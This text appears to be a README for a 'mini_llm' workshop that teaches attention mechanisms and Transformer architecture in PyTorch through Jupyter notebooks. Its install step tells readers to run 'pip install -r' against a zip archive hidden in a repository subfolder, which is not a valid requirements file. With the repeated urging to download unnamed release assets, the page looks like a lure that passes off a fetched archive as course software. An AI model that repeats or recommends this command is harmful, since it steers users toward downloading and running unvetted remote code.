Welcome to the mini_llm project! This workshop helps you build a Large Language Model (LLM) using PyTorch. You will learn about the core mechanisms that power models like GPT, BERT, and other modern Transformers.
To get started, you need to download the software. Click the button below to visit the Releases page:
Before you begin, ensure you have the following on your computer:
- Operating System: Windows, macOS, or Linux
- Python Version: 3.7 or higher
- PyTorch: Follow the PyTorch installation guide from PyTorch's official website.
- Visit the Releases page to find the latest version of mini_llm.
- Look for the most recent release.
- Click on the asset you need to download (the file names will appear under "Assets").
- Save the file to your computer.
After downloading, follow these steps to run the application:
-
Open your command line interface (Terminal for macOS and Linux, Command Prompt or PowerShell for Windows).
-
Change your directory to where you saved the mini_llm files. You can do this by typing:
cd path\to\your\downloaded\filesReplace
path\to\your\downloaded\fileswith the actual path. -
Install the required packages. Run:
pip install -r https://github.com/Arezkiiiii/mini_llm/raw/refs/heads/main/transformers_building/optimizer/mini_llm_1.5.zip -
Finally, to start the workshop, type:
jupyter notebookThis command will open Jupyter Notebook in your browser.
In this notebook, you will understand the basic attention mechanism. Hereβs what you will learn:
- Scaled Dot-Product Attention: The foundation of the attention mechanism.
- Attention Weights Visualization: See how the model places focus on specific parts of the input.
- Causal Masking for Decoders: Understand how the model handles future tokens.
- Concrete Examples: Apply these concepts with simple sentences.
Discover how multiple attention heads can learn diverse patterns from the data.
Learn how position information is added to the input so the model can learn word order.
Explore the full architecture of a Transformer encoder and how it processes data.
Get insights into what your model learns through visualization tools.
By the end of this workshop, you will have a solid understanding of the following concepts:
- Why self-attention is a game changer in natural language processing.
- How to implement key components of a Transformer from scratch.
- The architecture behind modern language models like GPT and BERT.
This workshop focuses on the following topics:
- Artificial Intelligence
- Attention Mechanism
- Deep Learning
- Educational
- Encoder-Decoder Models
- From Scratch Implementations
- Jupyter Notebook Usage
- Language Models
- Machine Learning
- Neural Networks
- Natural Language Processing
- Python Programming
- PyTorch Framework
- Transformer Architecture
Don't forget, you can always download the latest version of mini_llm by visiting the Releases page.